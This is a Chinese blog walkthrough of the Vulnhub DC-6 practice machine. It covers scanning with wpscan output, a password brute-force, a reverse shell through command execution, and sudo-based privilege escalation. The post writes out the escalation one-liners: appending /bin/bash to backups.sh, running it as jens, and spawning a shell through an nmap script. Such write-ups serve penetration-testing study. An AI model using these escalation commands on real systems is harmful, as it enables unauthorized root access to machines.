DC6靶场练习

最新推荐文章于 2024-01-16 23:16:35 发布
最新推荐文章于 2024-01-16 23:16:35 发布
阅读量109 收藏
点赞数
分类专栏: 靶场 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60848021/article/details/131401172
版权

一,靶场信息

 有2点需要注意:一,需要编辑hosts文件才能访问网站;二,给了一条线索,是一个密码文件。

二,信息收集

1,确定目标IP

 

2,端口扫描

 

 

3,漏洞扫描

 

4,修改hosts文件

 

 

5,敏感信息收集

 

6,wpscan报告

──(root💀kali)-[~]
└─# wpscan --url "http://wordy/"
WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.14
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://wordy/ [192.168.86.160]
[+] Started: Mon Jun 26 05:13:46 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jun 26 05:13:49 2023
[+] Requests Done: 180
[+] Cached Requests: 5
[+] Data Sent: 41.508 KB
[+] Data Received: 12.78 MB
[+] Memory used: 273.164 MB
[+] Elapsed time: 00:00:03

 

 

三,渗透过程

思路:nmap漏洞扫描中发现了几个用户名,线索刚好有一个密码本,可以试试爆破。

 1,导出密码本

2,使用wpscan进行爆破

 

 

 

3,在系统里找到了危险点(有可能存在任意命令执行漏洞) 

 4,进行反弹shell

 

 

 四,进行提权

在尝试了以前所使用的提权都没有效果,去home目录里看一下。

 

jens目录下面有个文件backups.sh,mark目录下也有个文件things-to-do.txt,里面有用户graham用户的密码,切换到graham用户。

思路:发现了jens用户的无密码命令执行文件backups.sh,可以以jens的身份横向命令执行

echo "/bin/bash" >>/home/jens/backups.sh

sudo -u jens ./backups.sh

 

 发现了具有root权限的nmap文件,接下来使用nmap进行提权就OK了。

 提权命令:

echo "os.execute('/bin/bash')">shell
nmap --script=shell

 

五,总结

本靶场主要考查了弱口令爆破,wpscan的应用,任意命令执行漏洞和sudo提权中的nmap提权。

一条贤鱼的学习站
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC-6靶场
qq_49518993的博客
08-31 1192
DC-6靶场
靶机7 DC-6(过程超详细)
honest_gg的博客
09-26 2601
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 743
DC-6靶机详细渗透过程
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 799
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
vulnhub靶场DC-6
qq_58091216的博客
01-11 1002
只有一个flag。
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
Sigrity 直流分析(PowerDC)操作练习
05-11
Sigrity 直流分析(PowerDC)操作练习 IRdrop分析
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
6-A DC-DC Buck Converter Selection Guide of Mid-range.pdf
10-30
6-A DC_DC Buck Converter Selection Guide of Mid-range
DC-6靶场渗透】
最新发布
一纸荒芜的博客
01-16 1108
DC6靶场渗透
DC-6靶场练习
weixin_52985767的博客
12-27 389
DC-6靶场复现
DC-6 靶场演练
猎荒者
03-04 741
Stand Out Fit In 环境准备 Kali Linux(IP:10.10.16.128) DC-6 靶机 NAT 网络连接 主机发现 端口扫描 目录爆破 漏洞挖掘 漏洞利用 ...
DC-6 靶场记录
m0_52729465的博客
06-04 72
sudo nmap --script=getroot.sh //nmap–script 参数可以执行脚本。使用 echo “/bin/bash” >> backups.sh 将/bin/bash写入backups.sh中。在mark的stuff目录下找到一个things-to-do.txt。使用wordy --url http://wordy/ -e u。sudo -u jens ./backups.sh 执行该文件。用sudo arp-scan -l。
DC-6 vulnhub靶场
weixin_62621015的博客
02-27 118
DC-6 vulnhub靶场个人通关记录 ;
Vulnhub靶场----6、DC-6
七天
02-24 778
Vulnhub-DC6
Vulnhub靶机:DC-6渗透详细过程
IerkeU的博客
03-12 2675
DC-6 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ DC-6是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。 并且,官方给了一个线索:cat /usr/share/wordlists/rockyou.
opengl 0X8DC6
05-31
抱歉,我之前的回答有误。在OpenGL中,0x8dc6代表GL_TRANSFORM_FEEDBACK_BUFFER_MODE属性,可以用来查询transform feedback缓冲区的模式。transform feedback是一种OpenGL功能,可以将顶点的输出数据写入到一个缓冲区中,用于后续的处理和渲染。GL_TRANSFORM_FEEDBACK_BUFFER_MODE属性的返回值是一个枚举类型,常见的枚举值有GL_INTERLEAVED_ATTRIBS、GL_SEPARATE_ATTRIBS等。这个属性通常会和其他OpenGL查询函数一起使用,例如glGetTransformFeedbackiv()函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值